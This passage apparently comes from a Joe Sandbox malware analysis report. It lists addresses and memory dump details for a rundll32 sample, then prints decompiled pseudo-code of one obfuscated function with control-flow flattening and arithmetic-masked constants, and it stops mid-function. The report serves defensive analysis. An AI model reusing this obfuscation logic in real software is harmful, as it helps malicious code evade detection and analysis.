                                                                                                                                  0x002d32ed
                                                                                                                                  0x002d32f8
                                                                                                                                  0x002d3303
                                                                                                                                  0x002d330b
                                                                                                                                  0x002d3313
                                                                                                                                  0x002d331b
                                                                                                                                  0x002d3323
                                                                                                                                  0x002d332b
                                                                                                                                  0x002d3336
                                                                                                                                  0x002d3341
                                                                                                                                  0x002d334c
                                                                                                                                  0x002d3357
                                                                                                                                  0x002d335e
                                                                                                                                  0x002d3369
                                                                                                                                  0x002d3371
                                                                                                                                  0x002d3379
                                                                                                                                  0x002d3381
                                                                                                                                  0x002d3389
                                                                                                                                  0x002d3394
                                                                                                                                  0x002d33a7
                                                                                                                                  0x002d33ae
                                                                                                                                  0x002d33b9
                                                                                                                                  0x002d33c1
                                                                                                                                  0x002d33c6
                                                                                                                                  0x002d33cb
                                                                                                                                  0x002d33d3
                                                                                                                                  0x002d33db
                                                                                                                                  0x002d33e0
                                                                                                                                  0x002d33e8
                                                                                                                                  0x002d33f0
                                                                                                                                  0x002d33f8
                                                                                                                                  0x002d3403
                                                                                                                                  0x002d340e
                                                                                                                                  0x002d3416
                                                                                                                                  0x002d3421
                                                                                                                                  0x002d342d
                                                                                                                                  0x002d3430
                                                                                                                                  0x002d3434
                                                                                                                                  0x002d343c
                                                                                                                                  0x002d3444
                                                                                                                                  0x002d344c
                                                                                                                                  0x002d3454
                                                                                                                                  0x002d3459
                                                                                                                                  0x002d3461
                                                                                                                                  0x002d3466
                                                                                                                                  0x002d346e
                                                                                                                                  0x002d3479
                                                                                                                                  0x002d3484
                                                                                                                                  0x002d348f
                                                                                                                                  0x002d349a
                                                                                                                                  0x002d34a5
                                                                                                                                  0x002d34ad
                                                                                                                                  0x002d34b8
                                                                                                                                  0x002d34c3
                                                                                                                                  0x002d34ce
                                                                                                                                  0x002d34d9
                                                                                                                                  0x002d34e4
                                                                                                                                  0x002d34ec
                                                                                                                                  0x002d34f1
                                                                                                                                  0x002d34f6
                                                                                                                                  0x002d34fe
                                                                                                                                  0x002d3506
                                                                                                                                  0x002d3511
                                                                                                                                  0x002d351c
                                                                                                                                  0x002d3527
                                                                                                                                  0x002d3532
                                                                                                                                  0x002d353d
                                                                                                                                  0x002d354a
                                                                                                                                  0x002d3555
                                                                                                                                  0x002d355a
                                                                                                                                  0x002d3565
                                                                                                                                  0x002d356a
                                                                                                                                  0x002d3575
                                                                                                                                  0x002d3580
                                                                                                                                  0x002d3588
                                                                                                                                  0x002d3593
                                                                                                                                  0x002d359e
                                                                                                                                  0x002d35a9
                                                                                                                                  0x002d35b4
                                                                                                                                  0x002d35bf
                                                                                                                                  0x002d35d4
                                                                                                                                  0x002d35d5
                                                                                                                                  0x002d35e0
                                                                                                                                  0x002d35e7
                                                                                                                                  0x002d35f2
                                                                                                                                  0x002d35fd
                                                                                                                                  0x002d3608
                                                                                                                                  0x002d3613
                                                                                                                                  0x002d361e
                                                                                                                                  0x002d3629
                                                                                                                                  0x002d3634
                                                                                                                                  0x002d363c
                                                                                                                                  0x002d3647
                                                                                                                                  0x002d3652
                                                                                                                                  0x002d365f
                                                                                                                                  0x002d3668
                                                                                                                                  0x002d366c
                                                                                                                                  0x002d3674
                                                                                                                                  0x002d367c
                                                                                                                                  0x002d3687
                                                                                                                                  0x002d3692
                                                                                                                                  0x002d369d
                                                                                                                                  0x002d36b0
                                                                                                                                  0x002d36b7
                                                                                                                                  0x002d36c2
                                                                                                                                  0x002d36cd
                                                                                                                                  0x002d36d8
                                                                                                                                  0x002d36e3
                                                                                                                                  0x002d36ee
                                                                                                                                  0x002d36f9
                                                                                                                                  0x002d3701
                                                                                                                                  0x002d370c
                                                                                                                                  0x002d3714
                                                                                                                                  0x002d3722
                                                                                                                                  0x002d3726
                                                                                                                                  0x002d372e
                                                                                                                                  0x002d3736
                                                                                                                                  0x002d3741
                                                                                                                                  0x002d374c
                                                                                                                                  0x002d3757
                                                                                                                                  0x002d3757
                                                                                                                                  0x002d3757
                                                                                                                                  0x002d375c
                                                                                                                                  0x002d3761
                                                                                                                                  0x002d3766
                                                                                                                                  0x002d3766
                                                                                                                                  0x002d3766
                                                                                                                                  0x002d3766
                                                                                                                                  0x002d3768
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002d376e
                                                                                                                                  0x002d392a
                                                                                                                                  0x002d3936
                                                                                                                                  0x002d3941
                                                                                                                                  0x002d3946
                                                                                                                                  0x002d394f
                                                                                                                                  0x002d3951
                                                                                                                                  0x002d395c
                                                                                                                                  0x002d3973
                                                                                                                                  0x002d398c
                                                                                                                                  0x002d3998
                                                                                                                                  0x002d39b5
                                                                                                                                  0x002d39c3
                                                                                                                                  0x002d39d1
                                                                                                                                  0x002d39e0
                                                                                                                                  0x002d39fd
                                                                                                                                  0x002d3a1c
                                                                                                                                  0x002d3a23
                                                                                                                                  0x002d3a2f
                                                                                                                                  0x002d3a43

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: "$ $(|?|$;]z$='mm$?$I*5$J&9$J&9$LCl$c@9$lT&$t1 $Y($>
                                                                                                                                  • API String ID: 0-1427316221
                                                                                                                                  • Opcode ID: 64364a64c53530a6c4355c51e311c14b97c2dd1c9780bebf111fb532956d41b0
                                                                                                                                  • Instruction ID: 996966ff6cae9634933e994e3e7d930ade589109f4055f23cf15ad8759c6252a
                                                                                                                                  • Opcode Fuzzy Hash: 64364a64c53530a6c4355c51e311c14b97c2dd1c9780bebf111fb532956d41b0
                                                                                                                                  • Instruction Fuzzy Hash: 1072FE715093818FD3B8CF25C58AB9BBBE1BBC4304F10891EE5DA96260DBB58959CF43
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                  			E002EAE6D(void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                  				intOrPtr _v4;
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				char _v12;
                                                                                                                                  				char _v16;
                                                                                                                                  				intOrPtr _v20;
                                                                                                                                  				intOrPtr _v24;
                                                                                                                                  				char _v28;
                                                                                                                                  				char _v32;
                                                                                                                                  				signed int _v36;
                                                                                                                                  				signed int _v40;
                                                                                                                                  				signed int _v44;
                                                                                                                                  				signed int _v48;
                                                                                                                                  				signed int _v52;
                                                                                                                                  				signed int _v56;
                                                                                                                                  				signed int _v60;
                                                                                                                                  				unsigned int _v64;
                                                                                                                                  				signed int _v68;
                                                                                                                                  				signed int _v72;
                                                                                                                                  				signed int _v76;
                                                                                                                                  				signed int _v80;
                                                                                                                                  				signed int _v84;
                                                                                                                                  				signed int _v88;
                                                                                                                                  				signed int _v92;
                                                                                                                                  				signed int _v96;
                                                                                                                                  				signed int _v100;
                                                                                                                                  				signed int _v104;
                                                                                                                                  				signed int _v108;
                                                                                                                                  				signed int _v112;
                                                                                                                                  				signed int _v116;
                                                                                                                                  				signed int _v120;
                                                                                                                                  				signed int _v124;
                                                                                                                                  				signed int _v128;
                                                                                                                                  				signed int _v132;
                                                                                                                                  				signed int _v136;
                                                                                                                                  				signed int _v140;
                                                                                                                                  				signed int _v144;
                                                                                                                                  				signed int _v148;
                                                                                                                                  				signed int _v152;
                                                                                                                                  				signed int _v156;
                                                                                                                                  				signed int _v160;
                                                                                                                                  				signed int _v164;
                                                                                                                                  				signed int _v168;
                                                                                                                                  				signed int _v172;
                                                                                                                                  				signed int _v176;
                                                                                                                                  				signed int _v180;
                                                                                                                                  				signed int _v184;
                                                                                                                                  				signed int _v188;
                                                                                                                                  				signed int _v192;
                                                                                                                                  				signed int _v196;
                                                                                                                                  				signed int _v200;
                                                                                                                                  				signed int _v204;
                                                                                                                                  				signed int _v208;
                                                                                                                                  				signed int _v212;
                                                                                                                                  				signed int _v216;
                                                                                                                                  				signed int _v220;
                                                                                                                                  				signed int _v224;
                                                                                                                                  				signed int _v228;
                                                                                                                                  				signed int _v232;
                                                                                                                                  				signed int _v236;
                                                                                                                                  				signed int _v240;
                                                                                                                                  				signed int _v244;
                                                                                                                                  				signed int _v248;
                                                                                                                                  				signed int _v252;
                                                                                                                                  				signed int _v256;
                                                                                                                                  				signed int _v260;
                                                                                                                                  				signed int _v264;
                                                                                                                                  				signed int _v268;
                                                                                                                                  				signed int _v272;
                                                                                                                                  				void* _t537;
                                                                                                                                  				void* _t566;
                                                                                                                                  				void* _t567;
                                                                                                                                  				intOrPtr _t573;
                                                                                                                                  				void* _t575;
                                                                                                                                  				void* _t577;
                                                                                                                                  				void* _t585;
                                                                                                                                  				void* _t588;
                                                                                                                                  				void* _t594;
                                                                                                                                  				void* _t596;
                                                                                                                                  				signed int _t603;
                                                                                                                                  				signed int _t604;
                                                                                                                                  				signed int _t605;
                                                                                                                                  				signed int _t606;
                                                                                                                                  				signed int _t607;
                                                                                                                                  				signed int _t608;
                                                                                                                                  				signed int _t609;
                                                                                                                                  				signed int _t610;
                                                                                                                                  				void* _t611;
                                                                                                                                  				void* _t633;
                                                                                                                                  				void* _t660;
                                                                                                                                  				void* _t675;
                                                                                                                                  				intOrPtr _t677;
                                                                                                                                  				intOrPtr _t680;
                                                                                                                                  				signed int* _t682;
                                                                                                                                  				void* _t685;
                                                                                                                                  
                                                                                                                                  				_push(_a20);
                                                                                                                                  				_t677 = __edx;
                                                                                                                                  				_push(_a16);
                                                                                                                                  				_v24 = __edx;
                                                                                                                                  				_push(0x20);
                                                                                                                                  				_push(_a8);
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_push(__edx);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				E002E20B9(_t537);
                                                                                                                                  				_v8 = 0x673696;
                                                                                                                                  				_t680 = 0;
                                                                                                                                  				_v4 = 0;
                                                                                                                                  				_t682 =  &(( &_v272)[7]);
                                                                                                                                  				_v144 = 0xf00d33;
                                                                                                                                  				_v144 = _v144 | 0x228e8b2e;
                                                                                                                                  				_t596 = 0x1d3710;
                                                                                                                                  				_v144 = _v144 >> 8;
                                                                                                                                  				_v144 = _v144 ^ 0x0022fe8f;
                                                                                                                                  				_v244 = 0xde08aa;
                                                                                                                                  				_t603 = 0x17;
                                                                                                                                  				_v244 = _v244 / _t603;
                                                                                                                                  				_v244 = _v244 + 0xffff54ea;
                                                                                                                                  				_v244 = _v244 << 0xa;
                                                                                                                                  				_v244 = _v244 ^ 0x23f0fc00;
                                                                                                                                  				_v224 = 0x36cb35;
                                                                                                                                  				_v224 = _v224 | 0xc39aec51;
                                                                                                                                  				_v224 = _v224 + 0x9146;
                                                                                                                                  				_t604 = 0x62;
                                                                                                                                  				_v224 = _v224 * 0x70;
                                                                                                                                  				_v224 = _v224 ^ 0xa3c851d0;
                                                                                                                                  				_v116 = 0xf2e64b;
                                                                                                                                  				_v116 = _v116 << 5;
                                                                                                                                  				_v116 = _v116 ^ 0x1e5cc960;
                                                                                                                                  				_v248 = 0x2b7d5f;
                                                                                                                                  				_t43 =  &_v248; // 0x2b7d5f
                                                                                                                                  				_v248 =  *_t43 * 0x53;
                                                                                                                                  				_v248 = _v248 + 0x8561;
                                                                                                                                  				_v248 = _v248 | 0xae4dc352;
                                                                                                                                  				_v248 = _v248 ^ 0xae5feb7e;
                                                                                                                                  				_v80 = 0xe6036b;
                                                                                                                                  				_v80 = _v80 * 0xb;
                                                                                                                                  				_v80 = _v80 ^ 0x09e22599;
                                                                                                                                  				_v240 = 0x5b8b4f;
                                                                                                                                  				_v240 = _v240 + 0xffffe1e0;
                                                                                                                                  				_v240 = _v240 ^ 0xb7b7812a;
                                                                                                                                  				_v240 = _v240 + 0xffff41e0;
                                                                                                                                  				_v240 = _v240 ^ 0xb7ec2de5;
                                                                                                                                  				_v232 = 0xf81ab6;
                                                                                                                                  				_v232 = _v232 ^ 0xa56b9217;
                                                                                                                                  				_v232 = _v232 | 0x431a55e8;
                                                                                                                                  				_v232 = _v232 << 7;
                                                                                                                                  				_v232 = _v232 ^ 0xcdeef480;
                                                                                                                                  				_v184 = 0xddfe73;
                                                                                                                                  				_v184 = _v184 * 0x26;
                                                                                                                                  				_v184 = _v184 << 8;
                                                                                                                                  				_v184 = _v184 ^ 0xf3c51200;
                                                                                                                                  				_v120 = 0x644fb5;
                                                                                                                                  				_v120 = _v120 >> 6;
                                                                                                                                  				_v120 = _v120 / _t604;
                                                                                                                                  				_v120 = _v120 ^ 0x00000418;
                                                                                                                                  				_v60 = 0xc6ff9f;
                                                                                                                                  				_v60 = _v60 ^ 0x0d96ce7d;
                                                                                                                                  				_v60 = _v60 ^ 0x0d5031e2;
                                                                                                                                  				_v204 = 0xeedb74;
                                                                                                                                  				_v204 = _v204 >> 0xb;
                                                                                                                                  				_v204 = _v204 >> 0xa;
                                                                                                                                  				_v204 = _v204 | 0xba569879;
                                                                                                                                  				_v204 = _v204 ^ 0xba56987f;
                                                                                                                                  				_v268 = 0x9a0618;
                                                                                                                                  				_v268 = _v268 ^ 0x10270239;
                                                                                                                                  				_v268 = _v268 ^ 0x733075d3;
                                                                                                                                  				_t605 = 0x16;
                                                                                                                                  				_v268 = _v268 / _t605;
                                                                                                                                  				_v268 = _v268 ^ 0x04865c22;
                                                                                                                                  				_v160 = 0x655fad;
                                                                                                                                  				_v160 = _v160 >> 3;
                                                                                                                                  				_v160 = _v160 >> 4;
                                                                                                                                  				_v160 = _v160 ^ 0x0009a8dc;
                                                                                                                                  				_v272 = 0x9202;
                                                                                                                                  				_v272 = _v272 | 0xfb135803;
                                                                                                                                  				_t606 = 0x41;
                                                                                                                                  				_v272 = _v272 * 0x2c;
                                                                                                                                  				_v272 = _v272 << 1;
                                                                                                                                  				_v272 = _v272 ^ 0x4ed07035;
                                                                                                                                  				_v100 = 0x536289;
                                                                                                                                  				_v100 = _v100 << 9;
                                                                                                                                  				_v100 = _v100 ^ 0xa6cd28cf;
                                                                                                                                  				_v108 = 0xf021d8;
                                                                                                                                  				_v108 = _v108 ^ 0x8f8b6ed2;
                                                                                                                                  				_v108 = _v108 ^ 0x8f701d8c;
                                                                                                                                  				_v152 = 0xcba027;
                                                                                                                                  				_v152 = _v152 ^ 0xce0cd109;
                                                                                                                                  				_v152 = _v152 | 0x7dfb06f6;
                                                                                                                                  				_v152 = _v152 ^ 0xfff88f5e;
                                                                                                                                  				_v252 = 0xf09c41;
                                                                                                                                  				_v252 = _v252 + 0x8e2a;
                                                                                                                                  				_v252 = _v252 << 3;
                                                                                                                                  				_v252 = _v252 | 0xdb831f2c;
                                                                                                                                  				_v252 = _v252 ^ 0xdf846234;
                                                                                                                                  				_v260 = 0x3d692f;
                                                                                                                                  				_v260 = _v260 << 2;
                                                                                                                                  				_v260 = _v260 | 0xbfb4a027;
                                                                                                                                  				_v260 = _v260 + 0x643;
                                                                                                                                  				_v260 = _v260 ^ 0xbffb0fde;
                                                                                                                                  				_v92 = 0x80bca7;
                                                                                                                                  				_v92 = _v92 >> 0xa;
                                                                                                                                  				_v92 = _v92 ^ 0x00038c1c;
                                                                                                                                  				_v228 = 0xbbbc43;
                                                                                                                                  				_v228 = _v228 | 0x61282476;
                                                                                                                                  				_v228 = _v228 + 0xffff6ee2;
                                                                                                                                  				_v228 = _v228 * 0x69;
                                                                                                                                  				_v228 = _v228 ^ 0x15ccd750;
                                                                                                                                  				_v236 = 0xc2062f;
                                                                                                                                  				_v236 = _v236 | 0xf7f3ef67;
                                                                                                                                  				_v236 = _v236 * 0x5c;
                                                                                                                                  				_v236 = _v236 ^ 0x1ba01eed;
                                                                                                                                  				_v128 = 0xa773bc;
                                                                                                                                  				_v128 = _v128 << 0x10;
                                                                                                                                  				_v128 = _v128 | 0xe162daa5;
                                                                                                                                  				_v128 = _v128 ^ 0xf3f36b57;
                                                                                                                                  				_v136 = 0x3287f3;
                                                                                                                                  				_v136 = _v136 / _t606;
                                                                                                                                  				_v136 = _v136 >> 9;
                                                                                                                                  				_v136 = _v136 ^ 0x000c37d1;
                                                                                                                                  				_v104 = 0x8d5fef;
                                                                                                                                  				_v104 = _v104 + 0xffff56ea;
                                                                                                                                  				_v104 = _v104 ^ 0x008f942b;
                                                                                                                                  				_v44 = 0xd6bac6;
                                                                                                                                  				_v44 = _v44 * 0x7f;
                                                                                                                                  				_v44 = _v44 ^ 0x6a80c639;
                                                                                                                                  				_v148 = 0xa4165e;
                                                                                                                                  				_v148 = _v148 * 0x13;
                                                                                                                                  				_v148 = _v148 | 0x84e82f79;
                                                                                                                                  				_v148 = _v148 ^ 0x8cef9599;
                                                                                                                                  				_v96 = 0xfc4916;
                                                                                                                                  				_v96 = _v96 + 0xffff0795;
                                                                                                                                  				_v96 = _v96 ^ 0x00f5cebb;
                                                                                                                                  				_v132 = 0xd5d7c2;
                                                                                                                                  				_v132 = _v132 >> 0x10;
                                                                                                                                  				_v132 = _v132 << 0xd;
                                                                                                                                  				_v132 = _v132 ^ 0x0010cc3c;
                                                                                                                                  				_v264 = 0xf6e8cb;
                                                                                                                                  				_v264 = _v264 + 0x6576;
                                                                                                                                  				_v264 = _v264 + 0x7b15;
                                                                                                                                  				_v264 = _v264 + 0x6b9c;
                                                                                                                                  				_v264 = _v264 ^ 0x00fe3ec7;
                                                                                                                                  				_v208 = 0x3a8541;
                                                                                                                                  				_v208 = _v208 | 0x57459f57;
                                                                                                                                  				_v208 = _v208 ^ 0x66631a8c;
                                                                                                                                  				_v208 = _v208 | 0x178bfabb;
                                                                                                                                  				_v208 = _v208 ^ 0x379a2cb6;
                                                                                                                                  				_v56 = 0x33c5e6;
                                                                                                                                  				_v56 = _v56 + 0x441;
                                                                                                                                  				_v56 = _v56 ^ 0x0035e6a0;
                                                                                                                                  				_v172 = 0x2bd4df;
                                                                                                                                  				_v172 = _v172 + 0xda1f;
                                                                                                                                  				_v172 = _v172 + 0x8171;
                                                                                                                                  				_v172 = _v172 ^ 0x002cd084;
                                                                                                                                  				_v48 = 0x796d26;
                                                                                                                                  				_v48 = _v48 + 0xffff3152;
                                                                                                                                  				_v48 = _v48 ^ 0x00766b67;
                                                                                                                                  				_v88 = 0xfc738c;
                                                                                                                                  				_v88 = _v88 << 0xe;
                                                                                                                                  				_v88 = _v88 ^ 0x1ce8da45;
                                                                                                                                  				_v140 = 0x79fdd0;
                                                                                                                                  				_v140 = _v140 >> 0xe;
                                                                                                                                  				_v140 = _v140 * 0x78;
                                                                                                                                  				_v140 = _v140 ^ 0x000f2c53;
                                                                                                                                  				_v64 = 0xd0b1f6;
                                                                                                                                  				_v64 = _v64 >> 9;
                                                                                                                                  				_v64 = _v64 ^ 0x000411a2;
                                                                                                                                  				_v200 = 0xaa2240;
                                                                                                                                  				_v200 = _v200 | 0x35f3f2d4;
                                                                                                                                  				_v200 = _v200 + 0x4147;
                                                                                                                                  				_v200 = _v200 + 0xffff1702;
                                                                                                                                  				_v200 = _v200 ^ 0x35f16a60;
                                                                                                                                  				_v52 = 0x980f89;
                                                                                                                                  				_v52 = _v52 ^ 0xc15a5b47;
                                                                                                                                  				_v52 = _v52 ^ 0xc1c323e9;
                                                                                                                                  				_v216 = 0xb7a8b5;
                                                                                                                                  				_v216 = _v216 >> 3;
                                                                                                                                  				_v216 = _v216 ^ 0xa2f7ad91;
                                                                                                                                  				_v216 = _v216 + 0xfffff0a8;
                                                                                                                                  				_v216 = _v216 ^ 0xa2ec62b8;
                                                                                                                                  				_v72 = 0x73581d;
                                                                                                                                  				_v72 = _v72 + 0xffffc838;
                                                                                                                                  				_v72 = _v72 ^ 0x00777119;
                                                                                                                                  				_v164 = 0x873053;
                                                                                                                                  				_v164 = _v164 ^ 0xefe323e3;
                                                                                                                                  				_v164 = _v164 | 0xd91bba05;
                                                                                                                                  				_v164 = _v164 ^ 0xff705bac;
                                                                                                                                  				_v40 = 0xf8d5df;
                                                                                                                                  				_v40 = _v40 ^ 0x79f853d7;
                                                                                                                                  				_v40 = _v40 ^ 0x79053437;
                                                                                                                                  				_v192 = 0x180af0;
                                                                                                                                  				_v192 = _v192 + 0xffff4c14;
                                                                                                                                  				_v192 = _v192 << 8;
                                                                                                                                  				_v192 = _v192 + 0x2aad;
                                                                                                                                  				_v192 = _v192 ^ 0x175759c3;
                                                                                                                                  				_v256 = 0x23b549;
                                                                                                                                  				_v256 = _v256 + 0x5eb6;
                                                                                                                                  				_v256 = _v256 | 0xffb7bbff;
                                                                                                                                  				_v256 = _v256 ^ 0xffb807e9;
                                                                                                                                  				_v176 = 0xc1fdd5;
                                                                                                                                  				_v176 = _v176 >> 0xc;
                                                                                                                                  				_v176 = _v176 | 0x5151af8d;
                                                                                                                                  				_v176 = _v176 ^ 0x515c7a4b;
                                                                                                                                  				_v112 = 0xec5780;
                                                                                                                                  				_v112 = _v112 ^ 0x97b4c021;
                                                                                                                                  				_v112 = _v112 ^ 0x9750bd7e;
                                                                                                                                  				_v180 = 0x591b41;
                                                                                                                                  				_v180 = _v180 + 0x207e;
                                                                                                                                  				_v180 = _v180 + 0xffffc81d;
                                                                                                                                  				_v180 = _v180 ^ 0x005ca8dc;
                                                                                                                                  				_v68 = 0x76fd1d;
                                                                                                                                  				_t675 = 0x5c52c4a;
                                                                                                                                  				_v68 = _v68 | 0x9e2d4356;
                                                                                                                                  				_v68 = _v68 ^ 0x9e728261;
                                                                                                                                  				_v76 = 0xf22a3;
                                                                                                                                  				_v76 = _v76 | 0x9c703035;
                                                                                                                                  				_v76 = _v76 ^ 0x9c7b5f20;
                                                                                                                                  				_v220 = 0x3decab;
                                                                                                                                  				_v220 = _v220 << 8;
                                                                                                                                  				_v220 = _v220 ^ 0x53082a5e;
                                                                                                                                  				_v220 = _v220 >> 0xd;
                                                                                                                                  				_v220 = _v220 ^ 0x0004d715;
                                                                                                                                  				_v84 = 0x6eb476;
                                                                                                                                  				_v84 = _v84 << 0xd;
                                                                                                                                  				_v84 = _v84 ^ 0xd68135de;
                                                                                                                                  				_v124 = 0x458e11;
                                                                                                                                  				_v124 = _v124 | 0x336f5b57;
                                                                                                                                  				_t607 = 0x43;
                                                                                                                                  				_v124 = _v124 / _t607;
                                                                                                                                  				_v124 = _v124 ^ 0x00c97d17;
                                                                                                                                  				_v156 = 0x7cba2c;
                                                                                                                                  				_t608 = 0x4b;
                                                                                                                                  				_v156 = _v156 / _t608;
                                                                                                                                  				_v156 = _v156 | 0x0b494d21;
                                                                                                                                  				_v156 = _v156 ^ 0x0b48f5d9;
                                                                                                                                  				_v36 = 0x519404;
                                                                                                                                  				_v36 = _v36 << 8;
                                                                                                                                  				_v36 = _v36 ^ 0x5195ba3f;
                                                                                                                                  				_v168 = 0xf13e55;
                                                                                                                                  				_v168 = _v168 | 0x95edbe5f;
                                                                                                                                  				_v168 = _v168 ^ 0xd6548190;
                                                                                                                                  				_v168 = _v168 ^ 0x43a3dbfd;
                                                                                                                                  				_v188 = 0xdd4a71;
                                                                                                                                  				_v188 = _v188 + 0xffff5bb0;
                                                                                                                                  				_v188 = _v188 >> 0xb;
                                                                                                                                  				_v188 = _v188 >> 6;
                                                                                                                                  				_v188 = _v188 ^ 0x000a03ec;
                                                                                                                                  				_v196 = 0x58b29f;
                                                                                                                                  				_t609 = 0x22;
                                                                                                                                  				_v196 = _v196 / _t609;
                                                                                                                                  				_v196 = _v196 + 0xffff713e;
                                                                                                                                  				_v196 = _v196 + 0xffff146a;
                                                                                                                                  				_v196 = _v196 ^ 0x000c9f67;
                                                                                                                                  				_v212 = 0xc056c;
                                                                                                                                  				_t610 = 0x45;
                                                                                                                                  				_v212 = _v212 * 0x51;
                                                                                                                                  				_v212 = _v212 >> 0xc;
                                                                                                                                  				_v212 = _v212 / _t610;
                                                                                                                                  				_v212 = _v212 ^ 0x0007774b;
                                                                                                                                  				while(1) {
                                                                                                                                  					L1:
                                                                                                                                  					_t566 = 0x6c6f684;
                                                                                                                                  					while(1) {
                                                                                                                                  						L2:
                                                                                                                                  						_t611 = 0x92c3a26;
                                                                                                                                  						while(1) {
                                                                                                                                  							L3:
                                                                                                                                  							do {
                                                                                                                                  								while(1) {
                                                                                                                                  									L4:
                                                                                                                                  									_t685 = _t596 - _t675;
                                                                                                                                  									if(_t685 > 0) {
                                                                                                                                  										break;
                                                                                                                                  									}
                                                                                                                                  									if(_t685 == 0) {
                                                                                                                                  										E002E6BC6(_v124, _v32, _v156);
                                                                                                                                  										_t596 = 0x4bc1ff4;
                                                                                                                                  										goto L1;
                                                                                                                                  									} else {
                                                                                                                                  										if(_t596 == 0x1d3710) {
                                                                                                                                  											_t596 = 0x6d0da1a;
                                                                                                                                  											continue;
                                                                                                                                  										} else {
                                                                                                                                  											if(_t596 == 0x19992af) {
                                                                                                                                  												_push(_t611);
                                                                                                                                  												_push(_t611);
                                                                                                                                  												_t573 = E002D7FF2(_v16);
                                                                                                                                  												__eflags = _t573;
                                                                                                                                  												_v20 = _t573;
                                                                                                                                  												_t660 = 0x19c2787;
                                                                                                                                  												_t596 =  !=  ? 0x19c2787 : 0x87f6c1b;
                                                                                                                                  												_t566 = 0x6c6f684;
                                                                                                                                  												_t611 = 0x92c3a26;
                                                                                                                                  												continue;
                                                                                                                                  											} else {
                                                                                                                                  												if(_t596 == _t660) {
                                                                                                                                  													_t575 = E002E7B05(_v16,  &_v32, _v28, _v216, _v72, _v164, _v248, _v40, _v80, _t611, _v192, _v256, _v20);
                                                                                                                                  													_t682 =  &(_t682[0xc]);
                                                                                                                                  													__eflags = _t575 - _v240;
                                                                                                                                  													_t611 = 0x92c3a26;
                                                                                                                                  													_t566 = 0x6c6f684;
                                                                                                                                  													_t596 =  ==  ? 0x92c3a26 : 0x4bc1ff4;
                                                                                                                                  													goto L3;
                                                                                                                                  												} else {
                                                                                                                                  													if(_t596 == 0x489cb15) {
                                                                                                                                  														_push(_v148);
                                                                                                                                  														_push(_v44);
                                                                                                                                  														_t577 = E002EDCF7(_v104, 0x2d18b4, __eflags);
                                                                                                                                  														_pop(_t633);
                                                                                                                                  														__eflags = E002F0B68(_t577,  &_v12, _v224, _v96, _t633,  &_v16, _v132, _v264, _v208, _v56, _v28, _v172) - _v116;
                                                                                                                                  														_t596 =  ==  ? 0x19992af : 0x87f6c1b;
                                                                                                                                  														E002DA8B0(_v48, _t577, _v88);
                                                                                                                                  														_t677 = _v24;
                                                                                                                                  														_t682 =  &(_t682[0xb]);
                                                                                                                                  														L24:
                                                                                                                                  														_t566 = 0x6c6f684;
                                                                                                                                  														_t611 = 0x92c3a26;
                                                                                                                                  														_t660 = 0x19c2787;
                                                                                                                                  														goto L25;
                                                                                                                                  													} else {
                                                                                                                                  														if(_t596 != 0x4bc1ff4) {
                                                                                                                                  															goto L25;
                                                                                                                                  														} else {
                                                                                                                                  															E002E8519(_v36, _v168, _v20);
                                                                                                                                  															_t596 = 0x87f6c1b;
                                                                                                                                  															while(1) {
                                                                                                                                  																L1:
                                                                                                                                  																_t566 = 0x6c6f684;
                                                                                                                                  																L2:
                                                                                                                                  																_t611 = 0x92c3a26;
                                                                                                                                  																L3:
                                                                                                                                  																goto L4;
                                                                                                                                  															}
                                                                                                                                  														}
                                                                                                                                  													}
                                                                                                                                  												}
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  									L28:
                                                                                                                                  									return _t680;
                                                                                                                                  								}
                                                                                                                                  								__eflags = _t596 - _t566;
                                                                                                                                  								if(_t596 == _t566) {
                                                                                                                                  									_t567 = E002E828A(_v68, _v76, _v220, _t677, _v120, 0x20, _v84, _v32);
                                                                                                                                  									_t682 =  &(_t682[6]);
                                                                                                                                  									_t596 = _t675;
                                                                                                                                  									__eflags = _t567 - _v60;
                                                                                                                                  									_t680 =  ==  ? 1 : _t680;
                                                                                                                                  									goto L24;
                                                                                                                                  								} else {
                                                                                                                                  									__eflags = _t596 - 0x6d0da1a;
                                                                                                                                  									if(__eflags == 0) {
                                                                                                                                  										_push(_v272);
                                                                                                                                  										_push(_v160);
                                                                                                                                  										_t585 = E002EDCF7(_v268, 0x2d1884, __eflags);
                                                                                                                                  										_push(_v152);
                                                                                                                                  										_push(_v108);
                                                                                                                                  										_t588 = E002D9462(_t585, _v260,  &_v28, E002EDCF7(_v100, 0x2d1814, __eflags), _v92, _v144);
                                                                                                                                  										_t682 =  &(_t682[9]);
                                                                                                                                  										__eflags = _t588 - _v244;
                                                                                                                                  										_t596 =  ==  ? 0x489cb15 : 0x822e036;
                                                                                                                                  										E002DA8B0(_v228, _t585, _v236);
                                                                                                                                  										E002DA8B0(_v128, _t586, _v136);
                                                                                                                                  										_t677 = _v24;
                                                                                                                                  										_t675 = 0x5c52c4a;
                                                                                                                                  										goto L24;
                                                                                                                                  									} else {
                                                                                                                                  										__eflags = _t596 - 0x87f6c1b;
                                                                                                                                  										if(_t596 == 0x87f6c1b) {
                                                                                                                                  											E002D957D(_v28, _v188, _v196, _v204, _v212);
                                                                                                                                  										} else {
                                                                                                                                  											__eflags = _t596 - _t611;
                                                                                                                                  											if(_t596 != _t611) {
                                                                                                                                  												goto L25;
                                                                                                                                  											} else {
                                                                                                                                  												_t594 = E002DA81D(_v32, _a4, _v176, _v112, _v232, _a20, _v180);
